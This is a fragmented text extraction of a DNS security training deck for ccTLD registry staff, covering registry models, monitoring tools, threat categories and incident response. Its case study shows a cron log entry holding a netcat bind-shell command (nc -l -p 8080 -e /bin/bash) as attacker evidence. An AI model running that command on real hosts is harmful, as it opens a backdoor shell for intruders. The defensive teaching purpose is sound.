Académique Documents
Professionnel Documents
Culture Documents
Welcome
Thank you!
APTLD Leonid Todorov
ICANN Steve Conte & John Crain
Introductions
Name?
Organization?
Duties?
Agenda
DNS Fundamentals
DNS TLD Registries
Performance Monitoring
DNS Threats
Incident Management & Response
Resilient Enterprises
Administrivia
During the course:
Ask questions when you have them no need to wait
Your experiences are valuable please share them
Schedule can be flexible just ask!
DNS FUNDAMENTALS
128.63.2.53
IPv4
H.ROOT-SERVERS.NET
2001:500:1::803F:235
IPv6
8
Distributed
There are literally millions of DNS servers all over the world. This
adds resiliency to the system if one goes down there is usually
another that can function in its place.
Hierarchical
Responsibility for a DNS server for any given domain is delegated
to the respective owner of that domain, who, in turn, may
outsource those functions to a provider.
icann.org
Consistent
st.icann.org
www.icann.org
A Brief History
March 1982 - Ken Harrenstien (et all) releases RFC 811
governing use of a hostname server with a centrally
managed file which contains names and addresses.
The ARPANet grows People want local control
November 1983 Paul Mokapetris releases RFC 882
and RFC 883 governing the concepts and operation of
the DNS.
November 1987 Paul Mokapetris releases RFC 1033
and RFC 1034 which refine the DNS.
The core pieces havent changed since (23 years)
11
DNS Operation
At a core level, the DNS is comprised of
Queries and Answers.
A user sends a query through a resolver to a
server. The server responds with an answer
to the query.
Query: What is www.icann.org?
User
Answer: 192.0.32.7
DNS Server
12
DNS Operation
A DNS packet is structured as such
A packet can be up to 65535 bytes in length
It can have multiple queries and answers.
In theory most DNS servers will respond to only the first
query and ignore the rest.
http://unixwiz.net/images/dns-query-packet.gif
13
DNS Operation
Root
ISP
.org
User
icann
.org
pir
.org
first
.org
14
DNS Operation
A Tree view of the DNS
. (Root)
ISP
.COM
User
example.
com
www.example.com
.ORG
icann
.org
ftp.icann.org
15
17
19
New Registration
Registrations are not typically made at the top level domain delegations are
usually done here.
20
21
New Delegation
22
23
See http://dns.measurementfactory.com/surveys/openresolver
s.html for more information!
24
25
26
27
Registry Structures
Registries Come in All Shapes and Sizes
Structure, Technical Implementation, Goals &
Policies
28
Registry Structures
Registry 2R Model
Registry - Registrant
Registry provides direct registrations to consumers
Registrants request domains directly through registry
Simple model
Doesnt scale without
lots of work from registry
Direct customer
relationships
Registry
Registrant
Registrant
29
Registry Structures
Registry 2R Model
Registry - Registrant
Registry provides direct registrations to consumers
Registrants request domains directly through registry or
optionally through a direct reseller
Registry
Reseller
Simple model
Direct customer
relationships
Offloads some customer
interface work from
registry to reseller
Registrant
Registrant
30
Registry Structures
Registry 3R Model
Registry Registrar Registrant
Registrars interface between customer and registry
Registry
Registrar
Registrar
Reseller
Registrant
Registrant
31
Registry Structures
Registries can define WHERE their customer
administrative data resides (WHOIS)
Thick the registry stores all customer data for
registrations regardless of _WHERE_ it originates (direct,
registrar)
Thin Registrars manage all customer data for their
registrants and serve this information via WHOIS
TLD
TLD
Registrar
WHOIS
Registrar
Thick
WHOIS
Registrar
Thin
32
Registry Structures
Registries define how subdomains are permitted
either at the top or second level.
Top level delegations fall immediately under the
top level
E.g. www.google.jo
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
34
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
38
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
39
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
43
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
44
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
45
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
47
NS3
Internal
NS1
External
International
User
Registrant
NS4
Internal
NS2
External
User
International User
48
Policies
Policies govern how registries operate, from internal
workings to dealing with customers.
Policies can be derived from operational necessities,
business goals, or best practices in use by other registries
Policies vary by registry and vary nearly as widely as the
registries themselves.
Its important for registries to define policies to respond and
operate in a consistent manner
Frequently, there is no right or wrong policy what matters
is the registrys definition of that policy.
The wrong policy is NO policy
49
Policy
Registrant Requirements
This policy defines the requirements to register a
domain with the registry; specifically addresses issues
like residency or ownership
Policy
Dispute Resolution
A controversial subject; one that is used infrequently, but
must be defined before its needed!
Disputes may arise between potential registrants for a
domain name each claiming the right to register it,
- or -
Policy
Registration Process
This policy defines how the registry accepts requests
for registrations, validates, and publishes them
Usually defined by operational necessity
Larger registries that process hundreds of registrations per
day will use automated processes as much as possible
Smaller registries may use manual processes
Policy
Information Release (WHOIS)
This policy defines how the registry handles privacy
information and what information it publicly publishes
The traditional approach is to publish administrative and
technical point of contact information for each domain
BUT, some registries / registrars offer a anonymous registration
service which publishes empty or generic information
Policy
Pricing / Funding Model
This policy defines how much domain registrations, their
renewal, transfer or other action cost.
Additional or value-added services may also be defined
54
Policy
Permissible Registrations
This policy defines what domain names may be
registered
Policy
Takedown
A very controversial topic, this defines how the registry
may temporarily or permanently deactivate a registration
More importantly, under what circumstances it may do so.
A Hypothetical Example
Lets take the simple example of a registration made for the purpose
of conducting a phishing attack.
The domain name closely resembles that used by an international
bank
The registrant provides fake name and address for registration
The registrant uses the domain to propagate a phishing attack,
soliciting bank customers for their usernames and passwords.
Whos responsible and whos accountable?
The malicious registrant? How do you find him?
The registry? They didnt validate the registrant but they get 5000
registrations a day how can they?
The bank? They didnt educate their customers on phishing attacks
The bank user?
57
Take Aways
The DNS operationally is simple; organizationally, its a much
different story there are many (widely varying) stakeholders
involved
Policies define how registries operate, but are frequently illdefined and untested
Unlike the traditional network security world, which has
CERTs and NOCs focusing on operating systems and
applications, the DNS has no equivalent structure for focusing
on security
58
PERFORMANCE MONITORING
59
Metrics
Network
Systems
Services
Definitions
Planning
NOC, customers
Metrics
Network performance metrics
Channel capacity, nominal & effective
Channel utilization
Delay and jitter
Packet loss and errors
62
Metrics
System performance metrics
Availability
Memory, CPU Utilization, load, I/O wait, etc.
65
66
Channel Utilization
What fraction of the nominal channel
capacity is actually in use
Important!
Future planning
What utilization growth rate am I seeing?
For when should I plan on buying additional capacity?
Where should I invest for my updates?
Problem resolution
Where are my bottlenecks, etc.
67
95th Percentile
The smallest value that is larger than 95% of the
values in a given sample
This means that 95% of the time the channel
utilization is equal to or less than this value
Or rather, the peaks are discarded from consideration
68
95th Percentile
Example of traffic above 95% of normal
69
70
End-to-end Delay
The time required to transmit a packet along
its entire path
Created by an application, handed over to the OS,
passed to a network card (NIC), encoded,
transmitted over a physical medium (copper,
fibre, air), received by an intermediate device
(switch, router), analyzed, retransmitted over
another medium, etc.
The most common measurement uses ping for
total round-trip-time (RTT).
71
72
Jitter
From Smokeping
73
Local Analysis
As we know...
Before we blame the network, let's verify
whether the problem is ours.
What can go wrong locally?
Hardware problems
Excessive load (CPU, memory, I/O)
74
Memory
Real
Virtual
I/O (Input/Output)
Storage
Network
75
Key Indicators
Insufficient CPU
Number of processes waiting to execute is always high
High CPU utilization (load avg.)
Insufficient memory
Very little free memory
Lots of swap activity (swap in, swap out)
Slow I/O
Lots of blocked processes
High number of block transfers
76
Local Analysis
Luckily, in Unix there are dozens of useful
tools that give us lots of useful information
about our machine
Some of the more well-known include:
vmstat
top
lsof
netstat
- tcpdump
- wireshark (ethereal)
- iptraf
- iperf
77
vmstat
Show periodic summary information about
processes, memory, pagin, I/O, CPU state, etc
78
top
Basic performance tool for Unix/Linux
environments
Periodically show a list of system performance
statistics:
CPU use
RAM and SWAP memory usage
Load average (cpu utilization)
Information by process
79
top cont.
Information by process (most relevant
columns shown):
PID: Process ID
USER: user running (owner) of the process
%CPU: Percentage of CPU utilization by the
process since the last sample
%MEM: Percentage of physical memory (RAM)
used by the process
TIME: Total CPU time used by the process since it
was started
80
netstat
Show us information about:
Network connections
Routing tables
Interface (NIC) statistics
Multicast group members
81
netstat
Some useful options
-n: Show addresses, ports and userids in numeric form
-r: Routing table
-s: Statistics by protocol
-i: Status of interfaces
-l: Listening sockets
--tcp, --udp: Specify the protocol
-A: Address family [inet | inet6 | unix | etc.]
-p: Show the name of each process for each port
-c: Show output/results continuously
82
netstat
Examples:
# netstat -n --tcp -c
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address
tcp
0
272 ::ffff:192.188.51.40:22
tcp
0
0 ::ffff:192.188.51.40:22
Foreign Address
::ffff:128.223.60.27:60968
::ffff:128.223.60.27:53219
State
ESTABLISHED
ESTABLISHED
Foreign Address
0.0.0.0:*
0.0.0.0:*
State
LISTEN
LISTEN
PID/Program name
11645/snmpd
1997/mysqld
# netstat -ic
Kernel Interface table
Iface
MTU Met
RX-OK RX-ERR RX-DRP RX-OVR
eth0
1500
0 2155901
0
0
0
lo
16436
0
18200
0
0
0
eth0
1500
0 2155905
0
0
0
lo
16436
0
18200
0
0
0
eth0
1500
0 2155907
0
0
0
lo
16436
0
18200
0
0
0
eth0
1500
0 2155910
0
0
0
lo
16436
0
18200
0
0
0
eth0
1500
0 2155913
0
0
0
83
netstat cont.
Examples:
# netstat tcp listening --program
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address
tcp
0
0 *:5001
tcp
0
0 localhost:mysql
tcp
0
0 *:www
tcp
0
0 t60-2.local:domain
tcp
0
0 t60-2.local:domain
tcp
0
0 t60-2.local:domain
tcp
0
0 localhost:domain
tcp
0
0 localhost:ipp
tcp
0
0 localhost:smtp
tcp
0
0 localhost:953
tcp
0
0 *:https
tcp6
0
0 [::]:ftp
tcp6
0
0 [::]:domain
tcp6
0
0 [::]:ssh
tcp6
0
0 [::]:3000
tcp6
0
0 ip6-localhost:953
tcp6
0
0 [::]:3005
Foreign Address
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
*:*
[::]:*
[::]:*
[::]:*
[::]:*
[::]:*
[::]:*
State
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
PID/Program name
13598/iperf
5586/mysqld
7246/apache2
5378/named
5378/named
5378/named
5378/named
5522/cupsd
6772/exim4
5378/named
7246/apache2
7185/proftpd
5378/named
5427/sshd
17644/ntop
5378/named
17644/ntop
84
netstat cont.
$ sudo netstat -atup
Active Internet connections (servers and established) (if run as root PID/Program name is
included)
Proto Recv-Q Send-Q Local Address
Foreign Address
State
PID/Program name
tcp
0
0 *:35586
*:*
LISTEN
2540/ekpd
tcp
0
0 localhost:mysql
*:*
LISTEN
2776/mysqld
tcp
0
0 *:www
*:*
LISTEN
14743/apache2
tcp
0
0 d229-231.uoregon:domain *:*
LISTEN
2616/named
tcp
0
0 *:ftp
*:*
LISTEN
3408/vsftpd
tcp
0
0 localhost:domain
*:*
LISTEN
2616/named
tcp
0
0 *:ssh
*:*
LISTEN
2675/sshd
tcp
0
0 localhost:ipp
*:*
LISTEN
3853/cupsd
tcp
0
0 localhost:smtp
*:*
LISTEN
3225/exim4
tcp
0
0 localhost:953
*:*
LISTEN
2616/named
tcp
0
0 *:https
*:*
LISTEN
14743/apache2
tcp6
0
0 [::]:domain
[::]:*
LISTEN
2616/named
tcp6
0
0 [::]:ssh
[::]:*
LISTEN
2675/sshd
tcp6
0
0 ip6-localhost:953
[::]:*
LISTEN
2616/named
udp
0
0 *:50842
*:*
3828/avahi-daemon:
udp
0
0 localhost:snmp
*:*
3368/snmpd
udp
0
0 d229-231.uoregon:domain *:*
2616/named
udp
0
0 localhost:domain
*:*
2616/named
udp
0
0 *:bootpc
*:*
13237/dhclient
udp
0
0 *:mdns
*:*
3828/avahi-daemon:
udp
0
0 d229-231.uoregon.ed:ntp *:*
3555/ntpd
udp
0
0 localhost:ntp
*:*
3555/ntpd
udp
0
0 *:ntp
*:*
3555/ntpd
udp6
0
0 [::]:domain
[::]:*
2616/named
udp6
0
0 fe80::213:2ff:fe1f::ntp [::]:*
3555/ntpd
udp6
0
0 ip6-localhost:ntp
[::]:*
3555/ntpd
85
udp6
0
0 [::]:ntp
[::]:*
3555/ntpd
86
lsof
Example:
First, using netstat -ln tcp determine that port
6010 is open and waiting for a connection
(LISTEN)
# netstat -ln --tcp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address
Foreign Address
State
tcp
tcp
0.0.0.0:*
0.0.0.0:*
LISTEN
0
0
0 127.0.0.1:6010
0 127.0.0.1:6011
LISTEN
87
lsof
Determine what process has the port (6010) open
and what other resources are being used:
# lsof -i tcp:6010
COMMAND
PID
sshd
sshd
10301 root
10301 root
USER
FD
6u
7u
53603
53604
# lsof -p 10301
COMMAND
sshd
sshd
sshd
sshd
sshd
sshd
sshd
sshd
sshd
sshd
sshd
sshd
sshd
...
PID
10301
10301
10301
10301
10301
10301
10301
10301
10301
10301
10301
10301
10301
USER
root
root
root
root
root
root
root
root
root
root
root
root
root
FD
cwd
rtd
txt
mem
mem
mem
mem
mem
mem
mem
mem
mem
mem
TYPE
DIR
DIR
REG
REG
REG
REG
REG
REG
REG
REG
REG
REG
REG
DEVICE
8,2
8,2
8,2
8,2
8,2
8,2
8,2
8,2
8,2
8,2
8,2
8,2
8,2
SIZE
4096
4096
379720
32724
15088
75632
96040
100208
11684
10368
7972
30140
11168
NODE
2
2
1422643
1437533
3080329
1414093
3080209
1414578
1414405
3080358
3080231
1420233
3080399
NAME
/
/
/usr/sbin/sshd
/usr/lib/libwrap.so.0.7.6
/lib/libutil-2.4.so
/usr/lib/libz.so.1.2.3
/lib/libnsl-2.4.so
/usr/lib/libgssapi_krb5.so.2.2
/usr/lib/libkrb5support.so.0.0
/lib/libsetrans.so.0
/lib/libcom_err.so.2.1
/usr/lib/libcrack.so.2.8.0
/lib/security/pam_succeed_if.so
88
lsof cont.
What network services am I running?
# lsof -i
COMMAND
PID
USER
FD
firefox
4429
hervey
50u
>128.223.60.21:www (ESTABLISHED
named
5378
bind
20u
named
5378
bind
21u
sshd
5427
root
3u
cupsd
5522
root
3u
mysqld
5586
mysql
10u
snmpd
6477
snmp
8u
exim4
6772 Debian-exim
3u
ntpd
6859
ntp
16u
ntpd
6859
ntp
17u
ntpd
6859
ntp
18u
ntpd
6859
ntp
19u
proftpd
7185
proftpd
1u
apache2
7246
www-data
3u
apache2
7246
www-data
4u
...
iperf
13598
root
3u
apache2
27088
www-data
3u
apache2
27088
www-data
4u
TCP
TCP
TCP
TCP
TCP
UDP
TCP
UDP
UDP
UDP
UDP
TCP
TCP
TCP
*:domain (LISTEN)
localhost:domain (LISTEN)
*:ssh (LISTEN)
localhost:ipp (LISTEN)
localhost:mysql (LISTEN)
localhost:snmp
localhost:smtp (LISTEN)
*:ntp
*:ntp
[fe80::250:56ff:fec0:8]:ntp
ip6-localhost:ntp
*:ftp (LISTEN)
*:www (LISTEN)
*:https (LISTEN)
IPv4 1996053
IPv4
15915
IPv4
15917
89
iptraf
Many measurable statistics and functions
By protocol/port
By packet size
Generates logs
Utilizes DNS to translate addresses
Advantages
Simplicity
Menu-based (uses curses)
Flexible configuration
90
iptraf
You can run it periodically in the background
(-B)
It allows you, for example, to run as a cron job to
periodically analyze logs.
Generate alarms
Save in a data base
Has a great name... Interactive Colorful IP LAN
Monitor
etc...
iptraf i eth0
Sample iptraf output from the above command:
92
iperf
To measure network throughput between two
points
iperf has two modes, server and
client
Easy to use
Great to help determine optimal TCP parameters
TCP window size (socket buffer)
MTU maximum segment size
See man iperf for more
93
iperf
Using UDP you can generate packet loss and jitter
reports
You can run multiple parallel sessions using threads
Supports IPv6
94
iperf parameters
Usage: iperf [-s|-c host] [options]
iperf [-h|--help] [-v|--version]
Client/Server:
-f, --format [kmKM] format to report: Kbits, Mbits, KBytes, MBytes
-i, --interval #
seconds between periodic bandwidth reports
-l, --len
#[KM] length of buffer to read or write (default 8 KB)
-m, --print_mss
print TCP maximum segment size (MTU - TCP/IP header)
-p, --port
#
server port to listen on/connect to
-u, --udp
use UDP rather than TCP
-w, --window #[KM] TCP window size (socket buffer size)
-B, --bind
<host> bind to <host>, an interface or multicast address
-C, --compatibility
for use with older versions does not sent extra msgs
-M, --mss
#
set TCP maximum segment size (MTU - 40 bytes)
-N, --nodelay
set TCP no delay, disabling Nagle's Algorithm
-V, --IPv6Version
Set the domain to IPv6
Server specific:
-s, --server
-U, --single_udp
-D, --daemon
Client specific:
-b, --bandwidth #[KM] for UDP, bandwidth to send at in bits/sec
(default 1 Mbit/sec, implies -u)
-c, --client <host> run in client mode, connecting to <host>
-d, --dualtest
Do a bidirectional test simultaneously
-n, --num
#[KM] number of bytes to transmit (instead of -t)
-r, --tradeoff
Do a bidirectional test individually
-t, --time
#
time in seconds to transmit for (default 10 secs)
-F, --fileinput <name> input the data to be transmitted from a file
-I, --stdin
input the data to be transmitted from stdin
-L, --listenport #
port to recieve bidirectional tests back on
-P, --parallel #
number of parallel client threads to run
-T, --ttl
#
time-to-live, for multicast (default 1)
95
iperf - TCP
$ iperf -s
-----------------------------------------------------------Server listening on TCP port 5001
TCP window size: 85.3 KByte (default)
-----------------------------------------------------------[ 4] local 128.223.157.19 port 5001 connected with 201.249.107.39 port 39601
[ 4] 0.0-11.9 sec 608 KBytes 419 Kbits/sec
-----------------------------------------------------------# iperf -c nsrc.org
-----------------------------------------------------------Client connecting to nsrc.org, TCP port 5001
TCP window size: 16.0 KByte (default)
-----------------------------------------------------------[ 3] local 192.168.1.170 port 39601 connected with 128.223.157.19 port 5001
[ 3] 0.0-10.3 sec 608 KBytes 485 Kbits/sec
96
iperf - UDP
# iperf -c host1 -u -b100M
-----------------------------------------------------------Client connecting to nsdb, UDP port 5001
Sending 1470 byte datagrams
UDP buffer size:
106 KByte (default)
-----------------------------------------------------------[ 3] local 128.223.60.27 port 39606 connected with 128.223.250.135 port 5001
[ 3] 0.0-10.0 sec
114 MBytes 95.7 Mbits/sec
[ 3] Sent 81377 datagrams
[ 3] Server Report:
[ 3] 0.0-10.0 sec
114 MBytes 95.7 Mbits/sec 0.184 ms
1/81378 (0.0012%)
$ iperf -s -u -i 1
-----------------------------------------------------------Server listening on UDP port 5001
Receiving 1470 byte datagrams
UDP buffer size:
108 KByte (default)
-----------------------------------------------------------[ 3] local 128.223.250.135 port 5001 connected with 128.223.60.27 port 39606
[ 3] 0.0- 1.0 sec 11.4 MBytes 95.4 Mbits/sec 0.184 ms
0/ 8112 (0%)
[ 3] 1.0- 2.0 sec 11.4 MBytes 95.7 Mbits/sec 0.177 ms
0/ 8141 (0%)
[ 3] 2.0- 3.0 sec 11.4 MBytes 95.6 Mbits/sec 0.182 ms
0/ 8133 (0%)
...
[ 3] 8.0- 9.0 sec 11.4 MBytes 95.7 Mbits/sec 0.177 ms
0/ 8139 (0%)
[ 3] 9.0-10.0 sec 11.4 MBytes 95.7 Mbits/sec 0.180 ms
0/ 8137 (0%)
[ 3] 0.0-10.0 sec
114 MBytes 95.7 Mbits/sec 0.184 ms
1/81378 (0.0012%)
97
Bibliography
Monitoring Virtual Memory with vmstat
http://www.linuxjournal.com/article/8178
TCPDump Tutorial
http://inst.eecs.berkeley.edu/~ee122/fa06/projects/tcpdump-6up.pdf
98
DNS THREATS
99
Cyber Threats
Open Question What Cyber Threats
Concern You?
Disruption of DNS Resolution Services
Falsified Registrant Information
Someone Stealing Your Customer Data
Hackers using Your Registry for BotNet Control
100
100
Foothold
Reconnaissance & Enumeration
Privilege Escalation
Some Attacks May Involve Multiple
Corruption
Categories
Disruption
Data Exfiltration
Time & Effort
Persistence
Foothold
Recon & Enum
Priv Esc.
Persistence
Malicious Use
Corruption
Data Exfiltration
Disruption
Concurrency
Malicious Use
101
Foothold
Initial attempts to access and establish a remote connection
into the network
Direct
SQL Injection, Operating System Exploits
Indirect
Phishing Email with Malware Attachments
Website Hosted Malware Installations
Motivations
Gain Access for Future Attacks
This is usually an
enabling attack
102
Foothold Attacks
These attacks will target your servers and
workstations anything that is accessible over the
network
Accessible Email, Web,
Remote Administration, etc
NS
NS
103
http://news.softpedia.com/news/PDF-Based-Targeted-AttackAgainst-Military-Contractors-Spotted-212139.shtml
fraudwatchinternational.com
104
Others?
105
Motivations
106
NS
NS
107
[dns1.example.net]
example.net. SOA dns01.example.net test.dns02.example.net. (1
3600 600 86400 3600)
example.net. NS dns01.example.net
example.net. NS dns02.example.net
example.net. MX 10 email.example.net
testpc TXT "payment processing computer"
testpc A 10.10.10.2
adminspc TXT Administrators PC"
adminspc A 10.10.10.3
test CNAME adminspc.test.net
108
[dns1.example.net]
example.net. SOA dns01.example.net test.dns02.example.net. (1
3600 600 86400 3600)
example.net. NS dns01.example.net
example.net. NS dns02.example.net
example.net. MX 10 email.example.net
testpc TXT "payment processing computer"
testpc A 10.10.10.2
adminspc TXT Administrators PC"
Email Server
adminspc A 10.10.10.3
test CNAME adminspc.test.net
109
[dns1.example.net]
example.net. SOA dns01.example.net test.dns02.example.net. (1
3600 600 86400 3600)
example.net. NS dns01.example.net
example.net. NS dns02.example.net
example.net. MX 10 email.example.net
testpc TXT "payment processing computer"
testpc A 10.10.10.2
adminspc TXT Administrators PC"
adminspc A 10.10.10.3
test CNAME adminspc.test.net
110
Network Monitoring
Know Whos Looking at You
Internal & External
Information Control
Limit the available information (ports, banners, zone file)
111
Privilege Escalation
Obtaining credentials, beyond what is
normally available, for the purpose of
accessing systems or information
Username / Password Cracking
Social Engineering
Exploiting Trust Relationships
Motivations
Gain Access to Information or for Future Attacks
112
NS
NS
113
114
Network Monitoring
Track failed login attempts
Track usage of trusted paths (e.g. EPP requests)
Anti-virus / Anti-spyware
Others?
115
Corruption
Modifying information or content on a system or application
Website Defacement
Cache Poisoning
Name Server Redirection
Motivations
011101001101
Corruption Attacks
Corruption Attacks will Target Your Data Stores
File Servers, Name Servers
May Also Target Recursive Name Servers
Business & Operations
Networks
NS
NS
Insider too!
117
Corruption Attacks
http://www.rankmyhack.com/
So many defacements
http://www.zone-h.org/archive/special=1
http://www.thehackernews.com/2011/08/rankmyhack-got-hacked-by-haxor.html
118
Corruption Example
Name Server Registration Redirection
Recall CheckFree.com!
Non-Authoritative Spoofing
Partido Colorado political statement made by
one organization against another during an
election
A
119
Corruption Example
Partido Colorado the ISP (Copaco) modified its own
recursive name servers to redirect users looking for
partidocolorado.org
201.217.51.114
66.249.01.121
120
Internal Monitoring
Compare to Known Good (read-only!) Copy
Implies you are making backups on a regular basis
121
Disruption
Denying, degrading, or otherwise limiting the
availability of services provided by a system or
application
Packet Floods
Deleting Operating System Files
Motivations
Disruption Attacks
These attacks target your external servers and/or
the links which service them
Regular Queries
How Many Queries per Second Can Your Servers Handle?
How Much Bandwidth Do You Have?
NS
NS
123
Disruption Attacks
These attacks target your external servers and/or the links
which service them; single points of failure
Limited Scale
http://www.ibtimes.com/articles/131421/20110406/anonymous-launchesddos-attack-on-sony.htm
http://www.darkgovernment.com/news/tsa-data-analyst-plannedcyber-attack/
124
Others?
125
Data Exfiltration
Copying data, that is not publicly accessible, from a
network for malicious purposes
Smash & Grab
Corporate Espionage
Motivations
Malicious: Taint Reputation of a Registry
Financial: Data Ransoming, Identity Theft
126
NS
NS
127
http://www.privacyrights.org/data-breach
http://datalossdb.org/
128
129
Network Monitoring
Create a Baseline of Your Normal Traffic
Continuously Compare Current Traffic to Baseline
130
Persistence
Establishing an unauthorized, constant, presence on the
network and thwarting administrator removal attempts
Root Kits
Monitoring Administrator Actions
Motivations
Malicious: Desire to Stay Within Your Network to Gain Additional
Access or Perform Additional Attacks
011101001101
131
Persistence Attacks
These Attacks May Target Any Host in Your Network,
from Servers to Workstations
Your External Service Providers are Not Immune Either!
Business & Operations
Networks
NS
NS
132
Persistence Example
An Attacker Compromises a Host Through
Phishing
Immediately installs a rootkit to hide evidence of
a successful compromise
Rootkit hides files, the interactive shell process,
and the network ports which the attacker uses to
access the compromised host
133
Persistence Attacks
http://www.computerworlduk.com/news/security/3288274/microsoft-warns-rootkitinfection-requires-windows-reinstall/?olo=rss
134
Malicious Use
Using the DNS to propagate malware or conduct
attacks in a malicious manner, yet consistent with
the DNS protocols
BotNet Command & Control
Amplification Attacks
Motivations
Malicious: Spreading malware through servers hiding
behind fictitious DNS registrations
Financial: For Hire BotNets use DNS for command and
control
136
Victim
NS
NS
137
138
http://blogs.cisco.com/security/talos/angler-domain-shadowing
139
Network Monitoring
Know what your expected baseline is monitor for
anomalies
140
141
143
Incident Handling
The project management, lead-the-team work
Unauthorized Access
Denial of service
Presence of malicious logic
Improper Usage
147
Preparation
Detect
Preservation
Duplication
Analysis
Respond
Reporting
Preparation
Identification
Containment
Eradication
Recovery
Lessons
Learned
148
Phases
Preparation
Policy
Detection &
Analysis
Sensors
Containment
Eradication
Recovery
Lessons
Learned
Management
Support
Deployment
Tool Usage
System Restore
Hot-wash
Logs
Info
Sharing
Law/
Media
Correlation
Traffic Flow
System Management
Rootkits
Metrics
Exercise
Declaration
Forensics
Polymorphic Code
APT
Repeat Attack
Monitoring
IT/User Interaction
Damage Assessment
Applying Lessons
149
Preparation
Preparation
Detection &
Analysis
Containment
Eradication
Recovery
Lessons
Learned
150
Eradication
Recovery
Lessons
Learned
151
Containment
Preparation
Detection &
Analysis
Containment
Eradication
Recovery
Lessons
Learned
152
Eradication
Preparation
Detection &
Analysis
Containment
Eradication
Recovery
Lessons
Learned
153
Recovery
Preparation
Detection &
Analysis
Containment
Eradication
Recovery
Lessons
Learned
154
Lessons Learned
Preparation
Detection &
Analysis
Containment
The importance of
documenting what occurred
cannot be understated. There
are undoubtedly process
improvements and policy
changes that need to be made.
Eradication
Recovery
Lessons
Learned
155
Preparation
Lessons
Detection
Learned
& Analysis
Recovery
Containment
Eradication
In order to prevent immediate reinfection, the systems must be purged
of any artifacts left by the attacker.
This is where they will be cleaned up.
156
Forensics
Incident
Response Team
Intelligence
Full-time
Detection &
Analysis
Advanced
Traffic
Monitoring
157
Case Study
INCIDENT RESPONSE
15
8
The Backstory
You run a ccTLD registry
You have a typical setup consisting of primary
and secondary DNS servers and a registry service
running on a web server.
For simplicity assume the web and primary DNS are
on the same server hosted in your office / data center
Lessons
Learned
160
Lessons
Learned
For discussion:
What would your tools tell you?
Do you have visibility into:
161
162
cat /etc/group
root@kali:~# cat /etc/group
root:x:0:
daemon:x:1:
admin:x:111:dnsadmin,test,dns
stunnel4:x:129:
sambashare:x:130:
163
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
ESTABLISHED
LISTEN
LISTEN
LISTEN
ESTABLISHED
ESTABLISHED
165
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
17:03:07
17:17:01
18:17:01
19:17:01
20:17:01
20:58:52
21:01:54
21:03:14
21:03:14
21:03:20
21:04:13
21:04:17
21:05:47
21:06:03
21:06:03
NS1
NS1
NS1
NS1
NS1
NS1
NS1
NS1
NS1
NS1
NS1
NS1
NS1
NS1
NS1
166
command
cd / && run-parts --report /etc/cron.hourly
test -x /usr/sbin/anacron || ( cd / && run-parts --report
test -x /usr/sbin/anacron || ( cd / && run-parts --report
test -x /usr/sbin/anacron || ( cd / && run-parts --report
nc l p 8080 e /bin/bash
167
aux
0.1
0.0
0.0
0.0
0.0
0.0
0.0
0.0
0.0
0.0
0.0
0.5
0.0
3.0
0.0
1.6
0.0
0.3
0.1
0.0
0.0
0.2
0.3
0.4
0.0
0.5
0.3
0.1
0.4
0.1
74504 16920 ?
2088
728 ?
6172 3572 pts/0
6472 1104 ?
0
0 ?
0
0 ?
6056 2416 pts/0
9864 3352 ?
7168 4384 pts/2
0
0 ?
47820 5836 ?
9916 3404 ?
9916 1700 ?
7172 4368 pts/1
4288 1180 pts/2
Sl
S
Ss
Ss
S
S
S+
Ss
Ss
S
Sl
Ss
S
Ss+
R+
05:00
05:00
05:00
06:00
06:05
06:05
06:07
06:07
06:07
06:09
06:09
06:18
06:18
06:18
06:54
0:04
0:00
0:00
0:00
0:00
0:00
0:00
0:00
0:00
0:00
0:00
0:00
0:00
0:00
0:00
gnome-terminal
gnome-pty-helper
bash
/usr/sbin/sshd
[kworker/0:1]
[kworker/0:0]
ssh root@localhost
sshd: root@pts/2
-bash
[kworker/0:2]
/usr/lib/packagekit/packagekitd
sshd: test [priv]
sshd: test@pts/1
-bash
ps aux
168
169
170
Lessons
Learned
Lessons
Learned
172
Recovery
Lessons
Learned
173
Eradication
Recovery
Lessons
Learned
174
Recovery
Lessons
Learned
175
RESILIENT ENTERPRISES
17
6
Resiliency
Service
Process
PEOPLE
INFORMATION
Process
TECHNOLOGY
FACILITIES
Assets
Adapted from SEI | CERT Resiliency Management Model
177
Elements of Resiliency
Security
Mostly Physical
Security, Life &
Limb
Business
Continuity
RESILIENCY
Information
Assurance,
Network Security
COOP,
Redundancy,
Back-ups
IT Operations
17
8
Resiliency Activities
Resiliency is being able to react to stress
without breaking
ISO 27002
Resiliency Frameworks
NIST SP 800-53 & ISO 27002 hundreds of
security controls grouped into families
Access Control, Config Management, IR, etc
Very large, all encompassing, and intimidating for
small organizations
Resiliency Frameworks
CSC (SANS) Top 20
20 things you can do today, includes guidance, recommended tools,
implementation ideas
Consensus of community experts
ASD Examples
Top 4
Application whitelisting
Patch application
Patch OS
Restrict administrative
privileges
Others
Application hardening
Host-Based IDS
Disable local administrator
accounts
Network segmentation
Multi-factor authentication
Application firewalls
Web filtering
Strong passwords
Network traffic capture
Event logging
182
Others
